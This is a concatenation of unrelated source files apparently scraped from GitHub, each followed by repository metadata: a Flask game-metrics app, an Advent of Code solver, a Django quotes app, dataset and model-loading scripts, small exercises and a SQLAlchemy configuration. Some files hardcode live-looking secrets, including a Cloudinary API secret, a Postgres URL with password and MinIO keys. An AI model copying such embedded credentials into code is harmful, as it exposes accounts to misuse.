for bonus in bonus_table:
if (right_now - bonus.et) > 3600:
# ok to show attacker name
try:
stage = [ who_inactive[bonus.att_id] ]
except:
stage = [ '?[' + str(bonus.att_id) + ']' ]
else:
# hide attacker name
stage = [ 'CENSORED[000000]' ]
stage.append(bonus.verb)
stage.append( bonus.def_name + '[' + str(bonus.def_id) + ']')
stage.append(bonus.outcome)
stage.append(bonus.num_respect)
bonus_list.append(stage)
bonus_list = sorted(bonus_list, key=lambda one: one[-1])
# player scoreboard (link to new route),
right_now = int(time.time())
scoreboard_chain_selection_pre = str(f_id) + '-scoreboard-' + str(chain.tstart) + '-' + str(right_now)
scoreboard_chain_selection = scoreboard_chain_selection_pre.encode("utf-8")
hmac_hex = hmac.new(hmac_key, scoreboard_chain_selection, digestmod=hashlib.sha1).hexdigest()
scoreboard_at = scoreboard_chain_selection_pre + '-' + hmac_hex + '-resd'
# inactive players
#
player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_score in player_scores:
if p_score.player_id in who_inactive:
if p_score.actions:
del who_inactive[p_score.player_id]
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_details.html', title='Chain details', f_id=f_id, outline=outline, scoreboard_at=scoreboard_at, inactive = who_inactive, bonus = bonus_list, faction_name=faction_name)
#=================================================================================
@app.route("/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_scoreboard(fid_tstart_timestamp_hmac):
# what chain is this meant to display?
re_object = chain_token_o.match(fid_tstart_timestamp_hmac)
if re_object:
f_id = re_object.group(1)
chain_tstart = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
orderparm = re_object.group(5)
else:
app.logger.info('in chain_player_summary RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
chain_selection = ( str(f_id) + '-scoreboard-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac etc
right_now = int(time.time())
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in chain_player_summary HMAC disagreement')
return render_template("bad_graph_request.html")
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in chain_player_summary timestamp is old')
return redirect('/rhubarb/chain_reports')
# read from ORM which chain has the right f_id and tstart
ch = None
chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
for chain in chains_from_orm:
ch = chain
if not ch:
return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
# hyperlinks for ordering table
hyper_seed = [ '/rhubarb/chain_scoreboard/' + fid_tstart_timestamp_hmac.rstrip('abcdefghijklmnopqrstuvwxyz') , 'Sort']
hyper = []
for nh in range(12):
hyper.append( hyper_seed[:] ) # copy makes these separate data items unlike [...] * N
table_column = {}
nh = 0
table_control = [['act','actions'], ['att','attacked'], ['hos','hospitalized'], ['mug','mugged'], ['res','respect'],
['ast','att_stale'], ['los','lost'], ['ate','att_escape'], ['dst','def_stale'], ['def','defend'], ['des','def_escape'], ['arh','perhit']]
for cols in table_control:
table_column[cols[0]] = cols[1]
hyper[nh][0] += cols[0] + 'd' # string addition to each column e.g. 'resd' to the end of the URL
nh += 1
# get from ORM data on this chain
# outline
tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
if ch.tend:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
over = True
else:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
over = False
outline = [tstart_text, et_text, over]
# members for names
who = {}
our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_mem in our_players:
who[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
# get from ORM the chain_player_summary for this chain
bonus_list = []
bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for bonus in bonus_table:
bonus_list.append([bonus.att_id, bonus.num_respect])
# get from ORM the chain_player_summary for this chain
summary = []
pid2av_respect = {}
pid2exp = {}
player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_score in player_scores:
# average respect scores to be computed here
total_respect = p_score.respect # made by adding floats then coerced to int
num_actions = p_score.actions
# amend by subtracting bonuses
for bonus in bonus_list:
if bonus[0] == p_score.player_id:
total_respect -= bonus[1]
num_actions -= 1
# respect per action (division)
res_explanation = ''
if num_actions >= 2:
av_respect = total_respect / num_actions
res_explanation = str(total_respect) + '/' + str(num_actions)
elif num_actions == 1:
av_respect = total_respect
else:
av_respect = 0.0
summary.append(p_score)
# 2 dicts passed along with the object data but not part of it
pid2av_respect[p_score.player_id] = str(av_respect)
pid2exp[p_score.player_id] = res_explanation
# SORTING depends on a parameter passed to the route
orderparm_s = orderparm[:3] # first 3 chars key the table_colum dict
if (len(orderparm) == 4) and (orderparm[-1] == 'd'):
reverse = True
# remove 'd' from one hyperlink
nh = 0
for cols in table_control:
if cols[0] == orderparm_s:
hyper[nh][0] = hyper[nh][0][:-1]
nh += 1
else:
reverse = False
# need to sort on the right property
if orderparm_s == 'arh':
# sorting by AverageRespectPer-Hit, which is outside the summary (array of objects)
# copy dict into a list that's sorted
sorted_av_respect_per_hit = sorted(pid2av_respect.items(), key=lambda kv: kv[1], reverse=reverse)
# make a replacement summary list in the new order
position = {}
n = 0
for x in summary:
position[x.player_id] = n
n += 1
new_summary = []
for x in sorted_av_respect_per_hit:
new_summary.append( summary[position[x[0]]] )
summary = new_summary
else:
# sorting by one of the properies in the object
try:
summary = sorted(summary, key=lambda one: getattr(one, table_column[orderparm_s]), reverse=reverse)
except:
app.logger.info('sort failed - maybe bad orderparm (%s) supplied', orderparm)
# decorate the data with a rank (n) and readable name (who)
deco = []
n=1
for x in summary:
if not who[x.player_id]:
who[x.player_id] = str(x.player_id)
deco.append( [n, who[x.player_id] , x])
n += 1
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_scoreboard.html', title='Chain scoreboard', f_id=f_id, outline=outline, hyper=hyper, deco=deco, faction_name=faction_name, pid2av_respect=pid2av_respect, pid2exp=pid2exp)
#=================================================================================
def test_strength(pw):
if len(pw) < 8:
return False
digest = hashlib.sha1(bytes(pw, 'utf-8')).hexdigest()
wantsha = Banned_pw.query.filter_by(sha = digest).first()
if wantsha:
# found in table => weak
return False
return True
#=================================================================================
if __name__ == "__main__":
app.run(debug = True)
| realname0000/torn_game_metrics | flask_graph_work/app.py | app.py | py | 84,701 | python | en | code | 0 | github-code | 36 |
28985781241 | from collections import Counter
from typing import Generator, Iterable, Literal, Set
import click
import trimesh.creation
from aoc_2022_kws.cli import main
from aoc_2022_kws.config import config
from trimesh import transformations
class Facet:
def __init__(
self, axis: Literal["x", "y", "z"], x: int, y: int, z: int, vector: int
):
self.axis = axis
self.x = x
self.y = y
self.z = z
self.vector = vector
def __repr__(self):
return f"Facet({self.axis}, {self.x}, {self.y}, {self.z} [{self.vector}])"
def __eq__(self, other):
return (
self.axis == other.axis
and self.x == other.x
and self.y == other.y
and self.z == other.z
)
def __hash__(self):
return hash((self.axis, self.x, self.y, self.z))
class Cube:
def __init__(self, *args):
if len(args) == 1:
self.x, self.y, self.z = [int(i) for i in args[0].split(",")]
else:
self.x, self.y, self.z = args
def __eq__(self, other):
return self.x == other.x and self.y == other.y and self.z == other.z
def __hash__(self):
return hash((self.x, self.y, self.z))
@property
def faces(self) -> Generator[Facet, None, None]:
yield Facet("x", self.x, self.y, self.z, -1)
yield Facet("x", self.x + 1, self.y, self.z, 1)
yield Facet("y", self.x, self.y, self.z, -1)
yield Facet("y", self.x, self.y + 1, self.z, 1)
yield Facet("z", self.x, self.y, self.z, -1)
yield Facet("z", self.x, self.y, self.z + 1, 1)
@property
def mesh(self):
move = transformations.translation_matrix(
(self.x + 0.5, self.y + 0.5, self.z + 0.5)
)
return trimesh.creation.box(extents=(1, 1, 1), transform=move)
def exterior(self, cubes: Set["Cube"]):
if set(self.neighbours) - set(cubes):
return True
def neighbour(self, x=0, y=0, z=0):
return Cube(self.x + x, self.y + y, self.z + z)
@property
def neighbours(self):
return [
self.neighbour(x=-1),
self.neighbour(x=1),
self.neighbour(y=-1),
self.neighbour(y=1),
self.neighbour(z=-1),
self.neighbour(z=1),
]
def calculate_bounding_box(cubes: Iterable[Cube]):
x_min = y_min = z_min = 0
x_max = y_max = z_max = 0
for cube in cubes:
x_min = min(x_min, cube.x)
y_min = min(y_min, cube.y)
z_min = min(z_min, cube.z)
x_max = max(x_max, cube.x)
y_max = max(y_max, cube.y)
z_max = max(z_max, cube.z)
return x_min, y_min, z_min, x_max, y_max, z_max
@main.command()
@click.option("--sample", "-s", is_flag=True)
@click.option("--save", type=click.Path(dir_okay=False), default=None)
@click.option("--view", is_flag=True)
def day18(sample, save, view):
if sample:
input_data = (config.SAMPLE_DIR / "day18.txt").read_text()
else:
input_data = (config.USER_DIR / "day18.txt").read_text()
cubes = [Cube(line) for line in input_data.splitlines()]
if save:
combined = trimesh.util.concatenate([c.mesh for c in cubes])
combined.export(save)
if view:
combined = trimesh.util.concatenate([c.mesh for c in cubes])
combined.show()
if view or save:
return
# Part 1
all_faces = []
for c in cubes:
all_faces.extend(c.faces)
face_counts = Counter(all_faces)
covered_faces = set([f for f, c in face_counts.items() if c > 1])
surface_faces = set(all_faces) - covered_faces
print("Part 1", len(surface_faces))
#######################################
# Part 2 #
#######################################
x_min, y_min, z_min, x_max, y_max, z_max = calculate_bounding_box(cubes)
print("Bounding box", x_min, y_min, z_min, x_max, y_max, z_max)
void_cubes = set()
for x in range(x_min - 1, x_max + 2):
for y in range(y_min - 1, y_max + 2):
for z in range(z_min - 1, z_max + 2):
my_cube = Cube(x, y, z)
if not my_cube in cubes:
void_cubes.add(my_cube)
print("Void cubes", len(void_cubes))
whole_area = set(cubes) | set(void_cubes)
print("Before", len(whole_area))
to_remove: Set | None = None
while to_remove is None or len(to_remove) > 0:
if to_remove:
whole_area -= to_remove
to_remove = set()
for my_cube in whole_area & void_cubes:
if my_cube in void_cubes and my_cube.exterior(whole_area):
to_remove.add(my_cube)
internal_void_cubes = set([c for c in whole_area if c in void_cubes])
print("After", len(internal_void_cubes))
internal_faces = set(f for c in internal_void_cubes for f in c.faces)
external_faces = surface_faces - internal_faces
print("Part 2", len(external_faces))
| SocialFinanceDigitalLabs/AdventOfCode | solutions/2022/kws/aoc_2022_kws/day_18.py | day_18.py | py | 5,002 | python | en | code | 2 | github-code | 36 |
73659014184 | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from login.models import User
from .models import Quote
# Create your views here.
def quotes(request):
if 'user_id' not in request.session:
return redirect('/')
all_users = User.objects.all()
user = User.objects.get(id=request.session['user_id'])
# quotes = Quote.objects.all()
likes = Quote.objects.filter(users_who_liked__id=user.id)
total_likes = likes.count()
quotes = Quote.objects.all().order_by('-id').exclude(id__in=[l.id for l in likes])
all_quotes = Quote.objects.all()
context = {
'all_users': all_users,
'user': user,
'quotes': quotes,
'all_quotes': all_quotes,
'likes': likes,
'total_likes': total_likes,
}
return render(request, "quotes.html", context)
def addQuote(request):
id = request.session['user_id']
user = User.objects.get(id=id)
errors = Quote.objects.validator(request.POST, id)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect("/quotes")
else:
new_quote = Quote.objects.create(
content = request.POST['quote'],
author = request.POST['author'],
poster = user,
)
return redirect("/quotes")
def addLike(request, quote_id):
if 'user_id' not in request.session:
return redirect('/')
current_user = User.objects.get(id=request.session['user_id'])
likedQuotes = Quote.objects.get(id=quote_id)
current_user.likes.add(likedQuotes)
return redirect('/quotes')
def deleteQuote(request, quote_id):
q2del = Quote.objects.get(id=quote_id)
q2del.delete()
return redirect('/quotes')
| everhartC/QuoteDash | quoteApp/views.py | views.py | py | 1,807 | python | en | code | 0 | github-code | 36 |
13859467294 | import xml.etree.ElementTree as ET
import json
path_train = "D:/code/prompt-ABSA/dataset/original data/ABSA16_Laptops_Train_SB1_v2.xml"
path_test = 'D:/code/prompt-ABSA/dataset/original data/EN_LAPT_SB1_TEST_.xml'
terr = 'laptops16'
def get_path(territory, data_type):
return f'./dataset/data/{territory}/{data_type}.json'
def judge(p):
for i in range(len(p)):
for j in range(i + 1, len(p)):
if p[j]['category'] == p[i]['category'] and p[j]['polarity'] != p[i]['polarity']:
return False
return True
def extract_data(path):
tree = ET.parse(path)
root = tree.getroot()
data = []
# 从xml文件中提取数据
for review in root:
for sentences in review:
for sentence in sentences:
piece = []
for t in sentence.iter('text'):
piece.append(t.text)
for o in sentence.iter('Opinion'):
d = {'category': o.attrib['category'], 'polarity': o.attrib['polarity']}
piece.append(d)
# 所有沒有category分類的句子以及所有一個category卻多個情感的句子
if len(piece) > 1 and judge(piece[1:]):
data.append(piece)
n_category = 0
category = []
# 进行数据统计
for e in data:
for i in range(1, len(e)):
c, s = e[i].values()
if c not in category:
n_category += 1
category.append(c)
all_data = [n_category, category, data]
return all_data
train_data = extract_data(path_train)
test_data = extract_data(path_test)
# 将train中没有而test中有的category從test中刪除
over_list = [elem for elem in test_data[1] if elem not in train_data[1]]
move_list = [elem for cate in over_list for elem in test_data[2] for e in elem[1:] if e['category'] == cate]
test_data[2] = [elem for elem in test_data[2] if elem not in move_list]
test_data[1] = [elem for elem in test_data[1] if elem not in over_list]
test_data[0] = len(test_data[1])
print(over_list)
with open(get_path(terr, 'train'), 'w', encoding='utf-8') as f:
json.dump(train_data, f)
with open(get_path(terr, 'test'), 'w', encoding='utf-8') as f:
json.dump(test_data, f)
| lazy-cat2233/PBJM | data_from_xml.py | data_from_xml.py | py | 2,285 | python | en | code | 1 | github-code | 36 |
23861578625 | from collections import defaultdict
def is_isogram(string):
dt = defaultdict(int)
for c in string.lower():
dt[c] += 1
for k in dt:
if k.isalpha() and dt[k] > 1:
return False
return True
| stackcats/exercism | python/isogram.py | isogram.py | py | 231 | python | en | code | 0 | github-code | 36 |
7796403598 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : 翻转字符串1.py
# @Author: smx
# @Date : 2019/8/18
# @Desc :
strings = list(input().strip().split(' '))
ans = ' '.join(map(lambda x: x[::-1], strings))
print(ans)
| 20130353/Leetcode | target_offer/字符串题/翻转字符串1.py | 翻转字符串1.py | py | 228 | python | en | code | 2 | github-code | 36 |
955639512 | pkgname = "python-idna"
pkgver = "3.4"
pkgrel = 0
build_style = "python_pep517"
make_check_target = "tests"
hostmakedepends = [
"python-build",
"python-installer",
"python-flit_core",
"python-wheel",
]
checkdepends = ["python-pytest"]
depends = ["python"]
pkgdesc = "Internationalized Domain Names in Applications (IDNA) for Python"
maintainer = "q66 <q66@chimera-linux.org>"
license = "BSD-3-Clause"
url = "https://github.com/kjd/idna"
source = f"$(PYPI_SITE)/i/idna/idna-{pkgver}.tar.gz"
sha256 = "814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4"
# dep cycle with pytest
options = ["!check"]
def post_install(self):
self.install_license("LICENSE.md")
| chimera-linux/cports | main/python-idna/template.py | template.py | py | 692 | python | en | code | 119 | github-code | 36 |
15871423301 | from pathlib import Path
from typing import Any, Dict
import torch
from tsm import TSM
from tsn import TSN, TRN, MTRN
verb_class_count, noun_class_count = 125, 352
class_count = (verb_class_count, noun_class_count)
def make_tsn(settings):
return TSN(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
consensus_type=settings["consensus_type"],
dropout=settings["dropout"],
)
def make_trn(settings):
model_type = settings["model_type"]
if model_type == "trn":
cls = TRN
elif model_type == "mtrn":
cls = MTRN
else:
raise ValueError(f"Unknown model_type '{model_type}' for TRN")
return cls(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
img_feature_dim=settings["img_feature_dim"],
dropout=settings["dropout"],
)
def make_tsm(settings):
non_local = settings["model_type"].endswith("-nl")
return TSM(
class_count,
settings["segment_count"],
settings["modality"],
base_model=settings["arch"],
new_length=settings["flow_length"] if settings["modality"] == "Flow" else 1,
consensus_type="avg",
dropout=settings["dropout"],
shift_div=settings["shift_div"],
shift_place=settings["shift_place"],
temporal_pool=settings["temporal_pool"],
non_local=non_local,
)
def make_model(settings: Dict[str, Any]) -> torch.nn.Module:
model_factories = {
"tsn": make_tsn,
"trn": make_trn,
"mtrn": make_trn,
"tsm": make_tsm,
"tsm-nl": make_tsm,
}
return model_factories[settings["model_type"]](settings)
def get_model_settings_from_checkpoint(ckpt: Dict[str, Any]) -> Dict[str, Any]:
settings = {
key: ckpt[key] for key in ["model_type", "segment_count", "modality", "arch"]
}
if ckpt["model_type"] == "tsn":
settings["consensus_type"] = ckpt["consensus_type"]
if ckpt["model_type"] in ["tsm", "tsm-nl"]:
for key in ["shift_place", "shift_div", "temporal_pool", "non_local"]:
settings[key] = ckpt[key]
if ckpt["model_type"] in ["trn", "mtrn"]:
settings["img_feature_dim"] = ckpt["img_feature_dim"]
settings.update(
{key: getattr(ckpt["args"], key) for key in ["flow_length", "dropout"]}
)
return settings
def load_checkpoint(checkpoint_path: Path) -> torch.nn.Module:
ckpt = torch.load(checkpoint_path)
model_settings = get_model_settings_from_checkpoint(ckpt)
model = make_model(model_settings)
model.load_state_dict(ckpt["state_dict"])
return model
| epic-kitchens/epic-kitchens-55-action-models | model_loader.py | model_loader.py | py | 2,906 | python | en | code | 73 | github-code | 36 |
14893965980 | #coding: utf-8
import sys,io
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
class Main(QWidget):
def __init__(self):
super().__init__()
self.mainUI()
def mainUI(self):
self.setGeometry(300,300,300,300)
self.setWindowTitle('文字区切り君')
self.lineEdit = QLineEdit(self)
self.button = QPushButton('区切る!',self)
self.button.clicked.connect(self.buttonClicked)
#layout
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.lineEdit)
self.vbox.addWidget(self.button)
self.setLayout(self.vbox)
self.show()
def buttonClicked(self):
if(self.lineEdit.text() is None):
pass
contents = str(self.lineEdit.text())
chars = list(contents)
strings = '/'.join(chars)
f = open('textfile.txt', 'w')
f.write(strings)
f.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
gui = Main()
sys.exit(app.exec_())
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
| hirotask/-Python-mojiretu_kugiru | 文字列区切る君/main.py | main.py | py | 1,205 | python | en | code | 1 | github-code | 36 |
16127941604 | # -*- coding: utf-8 -*-
# @Project :MyProject
# @File :create_particle
# @Date :2021/7/20 13:23
# @Author :Concon
# @Email :kangkang.liu@raykite.com
# @Software :PyCharm
import copy
import random
from my_api.demo.data_base import DataBase
class Generation3DData(DataBase):
def __init__(self):
super().__init__()
self.data = {
"id": None,
"coordinate": {}
}
def particle(self, num):
for n in range(num):
data = copy.deepcopy(self.data)
data["id"] = n
data["coordinate"]["lat"], data["coordinate"]["lng"] = self.generation_lat_lng_bj()
self.page_data["data"].append(data)
self.page_data["total"] = num
return self.page_data
def hot_chart(self, num):
for n in range(num):
data = copy.deepcopy(self.data)
data["id"] = n
data["count"] = str(random.randint(1, 1000))
data["coordinate"]["lat"], data["coordinate"]["lng"] = self.generation_lat_lng_bj()
self.page_data["data"].append(data)
self.page_data["total"] = num
return self.page_data
if __name__ == '__main__':
gen = Generation3DData()
print(gen.hot_chart(30))
# import wmi
#
# Pc = wmi.WMI()
# os_info = Pc.Win32_OperatingSystem()[0]
# os_name = os_info.Name.encode('utf-8').split(b'|')[0]
#
# print(f'操作系统: {os_name.decode()}')
import json
with open(r"C:\Users\RAYDATA\Desktop\test.json", "r") as f:
data = f.read()
for item in eval(data):
item["count"] = int(item["count"])
print(item)
| Meetky/RTestData | my_api/demo/create_3d_data.py | create_3d_data.py | py | 1,670 | python | en | code | 0 | github-code | 36 |
4078909742 | class Solution:
def canCompleteCircuit1(self, A, B):
if sum(A) < sum(B):
return -1
remaining_fuel = 0
idx = 0
for i in range(len(A)):
remaining_fuel += A[i]-B[i]
if remaining_fuel < 0:
idx += i+1
remaining_fuel = 0
return idx
def canCompleteCircuit(self, A, B):
if sum(A) < sum(B): return -1
idx = 0
total_cost = 0
rem_fuel = 0
for i in range(len(A)):
total_cost += A[i]-B[i]
rem_fuel += A[i]-B[i]
if rem_fuel < 0:
idx = i+1
rem_fuel = 0
return -1 if total_cost < 0 else idx
A = [1, 2, 4]
B = [2, 1, 3]
print(Solution().canCompleteCircuit(A,B)) | VishalDeoPrasad/InterviewBit | Greedy Alogrithm/Gas Station.py | Gas Station.py | py | 801 | python | en | code | 1 | github-code | 36 |
477002440 | import unittest
from .change_constraint import ChangeConstraint
from ..definitions.constraint import Constraint
class ChangeConstraintTest(unittest.TestCase):
def test_as_string(self):
constraint = Constraint('user_id_fk', 'user_id', 'users', 'id', on_update='cascade')
self.assertEquals(
"DROP FOREIGN KEY `user_id_fk`, ADD CONSTRAINT `user_id_fk` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE RESTRICT ON UPDATE CASCADE",
str(ChangeConstraint(constraint))
)
| cmancone/mygrations | mygrations/core/operations/change_constraint_test.py | change_constraint_test.py | py | 526 | python | en | code | 10 | github-code | 36 |
26192939759 | import os
import png
import math
from color_helpers import convert_16_bit_texture_for_pypng
# IO THPS Scene Image Correction
def shift_row_pixels(row_pixels, shift_amount):
shifted_row = []
shifted_row.extend(row_pixels[shift_amount * -4 :])
shifted_row.extend(row_pixels[0 : shift_amount * -4])
return shifted_row
def shift_image_rows(image_data, shift_amount):
shifted_image = image_data.copy()
for _ in range(shift_amount):
new_rows = []
new_rows.append(shifted_image[-1])
new_rows.extend(shifted_image[0:-1])
shifted_image = new_rows
return shifted_image
def shift_image_column(image_data, col_index, shift_amount, image_height):
column_data = []
col_start_index = col_index * 4
for row_index in range(image_height):
column_data.extend(image_data[row_index][col_start_index : col_start_index + 4])
shifted_column = shift_row_pixels(column_data, shift_amount)
new_image_data = []
for row_index in range(image_height):
if col_index != 0:
new_image_data.append(image_data[row_index][0:col_start_index])
else:
new_image_data.append([])
new_image_data[row_index].extend(shifted_column[row_index * 4 : row_index * 4 + 4])
new_image_data[row_index].extend(image_data[row_index][col_start_index + 4 :])
return new_image_data
def fix_pixel_data(width, height, pixels):
initial_image = []
for row in range(0, height):
cur_row = []
for col in reversed(range(row * width, (row + 1) * width)):
cur_row.extend(pixels[col])
shifted_right = shift_row_pixels(cur_row, 1)
initial_image.append(shifted_right)
shifted_down = shift_image_rows(initial_image, 1)
return shift_image_column(shifted_down, 0, -1, height)
# End IO THPS Scene Image Correction
def write_image(output_path, width, height, final_image):
os.makedirs(os.path.dirname(output_path), exist_ok=True)
output_file = open(output_path, "wb")
writer = png.Writer(width, height, greyscale=False, alpha=True)
writer.write(output_file, final_image)
output_file.close()
def write_to_png(filename, output_dir, create_sub_dirs, pvr, pixels):
filename_without_extension = "".join(filename.split(".")[0:-1])
if create_sub_dirs:
output_dir = os.path.join(output_dir, filename_without_extension)
output_path = os.path.join(output_dir, f"{filename_without_extension}_{pvr.header_offset:#0{8}x}.png")
if pvr.pal_size != 65536:
write_image(output_path, pvr.width, pvr.height, fix_pixel_data(pvr.width, pvr.height, pixels))
else:
write_image(output_path, pvr.width, pvr.height, convert_16_bit_texture_for_pypng(pvr.pixel_format, pvr.width, pixels))
| slfx77/psx_texture_extractor | helpers.py | helpers.py | py | 2,778 | python | en | code | 11 | github-code | 36 |
34443847573 | names = []
option = ""
def dropoff():
drop_off = input("What is the name of your child? ").upper().title()
names.append(drop_off)
def pickup():
pick_up = input("What is the name of your child? ").upper().title()
if pick_up in names:
print(pick_up, "has been picked up")
names.remove(pick_up)
else:
print("error")
def calc_cost():
price_per_hour = 12
cost = int(input("How many hours is your child going to stay for? "
"(please enter in numbers) "))
print("$", cost * price_per_hour)
def print_roll():
print(names)
while option != "5":
option = input("========================\n"
"Welcome to MGS Childcare.\n"
"What would you like to do?\n"
"1. Drop off a child\n"
"2. Pick up a child\n"
"3. Calculate cost\n"
"4. Print roll\n"
"5. Exit the system\n"
"Enter an option from 1 to 5: ")
if option == "1":
dropoff()
elif option == "2":
pickup()
elif option == "3":
calc_cost()
elif option == "4":
print_roll()
else:
print("Goodbye")
exit()
| yis1234/Projects | childcare.py | childcare.py | py | 1,250 | python | en | code | 0 | github-code | 36 |
28912411327 | """
ler maior numero digitado e quantas vezes foi digitado o maior numero
"""
# Declaração de variaveis
index = 0
qtd_maior = 0
contador = 0
qtd = int(input("Quantidade de repetições: "))# Entrada do user
while index <= qtd-1:
valor = int(input(f"Valor({index + 1}): ")) # Entrada do user
contador += 1 # adicionar valor ao contador
if contador == 1: # Adicionando valor ao atual_maior e atual_menor
atual_maior = valor
atual_menor = valor
qtd_maior+=1
else:
# Verificação
if valor >= atual_maior:
atual_maior = valor
qtd_maior += 1
index+=1
# Saida para o user
print(f"Valor maior digitado: {atual_maior} e foi digitado o maior valor {qtd_maior}x.")
| BrunoDias312/CursoPython | Curso/Atividade Curso/Secao 06/Questao18.py | Questao18.py | py | 750 | python | pt | code | 0 | github-code | 36 |
23013394729 | import requests
import os
def gokidsgo():
a = input('Url? default: 127.0.0.1/').rstrip()
if a == '':
url = 'http://127.0.0.1/icons/folder.gif'
print('grabbing: ' + url)
req = requests.get(url, timeout=90)
if req.ok:
dat = req.text
print(dat)
else:
print('error: ')
print(str(req.status_code))
else:
url = a
req = requests.get(url, timeout=90)
if req.ok:
dat = req.text
print(dat)
else:
print('error: ')
print(str(req.status_code))
def main():
a = input('ready, type go, or type exit').rstrip()
if a.find('exit') > -1:
print('quitting')
quit()
if a.find('go') > -1:
gokidsgo()
if a == '':
gokidsgo()
main()
if __name__ == "__main__":
main() | thcsparky/bigclickskid | oldtries/sandbox.py | sandbox.py | py | 952 | python | en | code | 0 | github-code | 36 |
40176740668 | # Compute column.
# input is the input text string
# token is a token instance
def find_column(input, token):
# when carriage return is detected, reset the counting...
last_cr = input.rfind('\n', 0, token.lexpos)
if last_cr < 0:
# Not found
last_cr = 0
column = (token.lexpos - last_cr) + 1
# returning the pure position of token in it's expression
return column | alifzl/Final-Compiler-Course-Project | Implementation/source_code/src/lexical/commom.py | commom.py | py | 402 | python | en | code | 0 | github-code | 36 |
24814387482 | #! /usr/bin/env python
from __future__ import print_function
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
import Addressbook_pb2
import sys
from google.protobuf import json_format
import json
import glob
import errno
if __name__ == "__main__":
confz = SparkConf()\
.set("spark.hadoop.fs.s3a.endpoint","http://127.0.0.1:9000")\
.set("spark.hadoop.fs.s3a.access.key","minio")\
.set("spark.hadoop.fs.s3a.secret.key","minio123")\
.set("spark.hadoop.fs.s3a.path.style.access","true")\
.set("spark.hadoop.fs.s3a.impl","org.apache.hadoop.fs.s3a.S3AFileSystem")
spark = SparkSession.builder.master("local[3]").appName("Test4").config(conf=confz).getOrCreate()
ndf = spark.read.option("multiline","false").format("json").load("s3a://spark-test/jsontest")
ndf.write.mode("overwrite").format("json").save("/home/yy/fod/jsonfile")
address_book = Addressbook_pb2.AddressBook()
json_dict = {}
files = glob.glob("/home/yy/fod/jsonfile/*.json")
for name in files:
try:
with open(name) as f:
json_dict.update(json.load(f))
except IOError as exc:
if exc.errno != errno.EISDIR:
raise
address_book = json_format.ParseDict(json_dict, Addressbook_pb2.AddressBook())
with open(sys.argv[1], "wb") as f:
f.write(address_book.SerializeToString())
| yiyuan906/ProjectWork | ProtobufTest/SparkConvertFrom.py | SparkConvertFrom.py | py | 1,367 | python | en | code | 0 | github-code | 36 |
43710529105 | from hashlib import sha1
class Signature() :
def __init__(self,secret):
self.secret = secret
def validate(self,request):
keys = request['signature']['signed'].split(',')
signing_string = ''
for key in keys :
signing_string += request[key]
token = sha1(signing_string + request['signature']['nonce'] + self.secret).hexdigest()
return token == request['signature']['token']
def generate(self,request,nonce):
signed = []
signing_string = ""
for key in request :
signed.append(key)
signing_string += str(request[key])
signing_string += nonce + self.secret
request["signature"] ={
"signed":",".join(signed),
"token": sha1(signing_string ).hexdigest(),
"nonce" : nonce}
return request
| gouravnema/signature | python/Signature.py | Signature.py | py | 888 | python | en | code | 0 | github-code | 36 |
4275879545 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import cloudinary
cloudinary.config(
cloud_name="djtxsnk9c",
api_key="372171617535646",
api_secret="2zMo8MA5wgslqPtRwHOVS1AFRks",
)
# SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
SQLALCHEMY_DATABASE_URL = "postgres://dmgshbpnrymmwi:262dd54c1af68404d1ad96bfc7d61323703e56f967432b51931a3f6a6643ed4d@ec2-34-206-8-52.compute-1.amazonaws.com:5432/d6bnjatookfchk"
# "postgresql://fastapi_user:fastapi@localhost/fastapi_db"
engine = create_engine(
SQLALCHEMY_DATABASE_URL, # connect_args={"check_same_thread": False}
)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
| ddicko/deploy_fastapi | sql_app/database.py | database.py | py | 775 | python | en | code | 0 | github-code | 36 |
15672169459 | from datetime import datetime
import logging
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('discord').setLevel(logging.INFO)
dt_fmt = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(format='[{asctime}] [{levelname:<8}] [{name:<15}]: {message}',
style='{',
datefmt='%Y-%m-%d %H:%M:%S')
